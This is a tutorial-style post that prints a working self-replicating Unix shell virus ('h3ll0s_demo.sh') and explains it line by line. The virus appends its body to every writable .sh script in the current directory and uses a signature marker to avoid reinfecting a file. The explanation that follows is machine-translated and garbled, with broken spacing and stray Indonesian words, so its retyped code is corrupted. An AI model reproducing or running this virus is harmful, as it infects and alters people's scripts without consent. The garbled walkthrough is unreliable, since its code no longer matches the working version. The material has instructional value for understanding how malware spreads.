UNIX SHELL Virus
This program is of little practical significance, but it is helpful to understand the mechanism of visual spread of the virus. Therefore, it is instructive significance is more important than the practical.
following the program
Code:
#!/bin/sh
#file name: h3ll0s_demo.sh
#purpose: shell virus demonstration
# note: the virus will affect all the files ending with *. sh in the current
directory, but it will not affect them repeatedly.
#compiler: watercloud@xfocus.org
#date: 13-12-2011
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Demo shell virus script !"
#E:<+!a%C&t:>
#EOF
Keep the format Unixvirus.sh
Her statement:
# B: <+% C & t:!>
Virus from the body tag, so the program can find themselves during copying.
vFile = $ _;. vTmp = / tmp / .vTmp $ $
Defining two variables. One is a temporary file, file-note when ininama $ _. Therefore we need this line should be the first line in the line of effective programs, otherwise it is not possible to get the name of the current program, and then it is impossible to find the body of the virus to copy.
untuk f di / *. sh;.do
Begin the circle, and know all the programs that end with sh di.saat directory.
if [! -W $ f-a! -R $ vFile], then continue; fi
If the target has been writing privileges and if the virus source file has read privileges.
if grep '<+% C & t:!>' $ f, then continue; fi
If the target has been irreversibly affected. If so it would be immoral to influence another.
jika sed-n '1 p '$ f | grep' csh ', then continue; fi
If the target in the csh shell, they are too different in grammar.
cp-f $ f $ vTmp, jika [$? -Ne 0], then continue; fi
Get ready for influence. First copy the backup to the target. What if copying fails? Of course, had no choice but to surrender.
VNO=`awk '$ 0 ~ / (^ \ *#)|(^ b \ b *$)/&& v == NR-1 {v} + + END {print 0 + v}' $ vTmp`
to determine the initial and formal expression. This is one used to find how much. comment lines and blank lines at the beginning of the program, so as to determine the position of the body to inject the virus.
sed-n "1, $ {} VNO p" $ vTmp> $ f
Sed the start command to copy the comments of the target file back from the backup file.
(Sed-n '/ ^ # B: <+ a% K & t :>/,/^# E: <+ a% K & t:!> / P' $ vFile; echo)>> $ f
One more sed to solve transportation virus body.
VNO = `expr $ VNO + 1`sed-n "$ {VNO}, \ $ p" $ vTmp>> $ f
The last sed moving other parts of the target file again. sed strong!
rm-f $ vTmp
Clean up temporary files.do> / dev / null 2> & 1
Circle ends.unset vTmp; unset vFile; unset VNO
Clean scene.echo "Demo shell virus script !"
Since the file has been affected, showing some indication to say this is an affected one.
# EOF:
Stop the virus body marking, so the program puts its own copy.
